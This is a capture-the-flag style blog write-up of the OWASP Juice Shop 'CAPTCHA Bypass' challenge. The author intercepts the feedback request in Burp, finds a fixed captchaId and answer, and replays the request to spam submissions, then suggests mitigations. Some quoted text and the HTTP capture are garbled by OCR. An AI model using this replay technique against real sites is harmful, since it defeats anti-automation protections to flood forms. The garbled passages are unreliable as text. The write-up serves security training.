Hacking OWASP’s Juice Shop Pt. 20: CAPTCHA Bypass


Name:  CAPTCHA Bypass

Description: Submit 10 or more customer feedbacks within 10 seconds.

Difficulty: 3 star

Category: Broken Anti-Automation

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-anti-automation.html

Tools used:

Burp, FoxyProxy

Resources used:



As usual, I started with the expanded description, which provided three possible methods for completing this challenge. Only one looked appealing, however.

Submit 10 or more customer feedbacks within 10 seconds 
The Contact Us form for customer feedback contains a CAPTCHA to protect it from being abused through 
scripting. This challenge is about beating this automation protection. 
A completely automated public Turing test to tell computers and humans apart, or CAPTCHA, is a 
program that allows you to distinguish between humans and computers. First widely used by Alta 
Vista to prevent automated search submissions, CAPTCHAs are particularly effective in stopping any 
kind of automated abuse, including brute-force attacks. They work by presenting some test that is 
easy for humans to pass but difficult for computers to pass; therefore, they can conclude with some 
certainty whether there is a human on the other end 
For a CAPTCHA to be effective, humans must be able to answer the test correctly as close to 100 
percent of the time as possible. Computers must fail as close to 100 percent of the time as possible. 
• You could prepare 10 browser tabs, solving every CAP TCHA and filling out the each feedback form. 
Then you'd need to very quickly switch through the tabs and submit the forms in under 10 seconds 
• Should the Juice Shop ever decide to change the challenge into "Submit 100 or more customer 
feedbacks w,'thin 60 seconds" or worse, you'd probably have a hard time keeping up with any tab- 
switching approach. 
• 'Investigate closélVhoWtheCAPTCHAnechamsmyorksanfftrytOfindéitheV4 
Wrap this into a script (in whatever programming language you prefer) that repeats this 10 times.

First let’s figure out how the CAPTCHA mechanism works. I set up Burp and FoxyProxy, then made my way to the Customer Feedback form.

Customer Feedback 
Author - 
burpsuite go brrrr 
O Max. 160 characters 
What is 
7+6+1 ? 

Nothing on the screen jumped out at me, so after filling in the form, I sent it off to Burp for analysis.

Burp Project 
Intruder Repeater Window 
Help Logger++ HIT P Request Smuggler 
Sequencer Decoder 
Raw Actions V 
1 POST /api/Feedbacks/ HTTP/I.I 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
4 Accept 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
7 Content -Type: application/ j son 
Content -Length: 84 
Origin: http 
// I Ocal host 3000 
10 Connection: close 
Referer: http://localhost : 3000/ 
Gecko,'20100101 Firefox,'78.o 
12 Cookie: language=en; welcomebanner status=dismiss; 
14 { 
rating" : I 
'burpsuite go brrrr 
O matches
If you change the rating to “0”, you can also solve the “Zero Stars” challenge.

If “captchaId” is always 0, and the answer to “captchaId” 0 is always 14, then all that really needs to be done to bypass the CAPTCHA and complete the challenge is to send the packet to Burp’s Repeater tab and spam the “Send” button until you see…

You successfully solved a challenge: CAPTCHA Bypass (Submit 10 or more customer feedbacks within 10 seconds.) 

Prevention and Mitigation Strategies:

Use actual CAPTCHA, only allow registered users to submit feedback, and limit the number of feedback comments each registered user is allowed to submit in a given time span.

Lessons Learned and Things Worth Mentioning: 

  1. CAPTCHA is successful for a variety of reasons. Home-brewed CAPTCHA copies are never going to be as sophisticated as the real thing.
  2. While the other two methods suggested in the expanded description would all work, I chose this method because every bit of practice I can get with Burp Suite helps me get more comfortable with it.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s